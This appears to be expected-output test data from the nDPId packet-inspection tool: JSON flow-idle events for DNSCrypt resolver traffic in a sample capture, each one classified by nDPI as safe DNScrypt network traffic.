+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317494,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318202,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305331,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317460,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305461,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304806,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299355,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305187,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380837,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348913,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348916,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402357,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312464,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312463,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312181,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317829,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305348,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304804,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312178,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396069,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311306,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337218,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311312,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
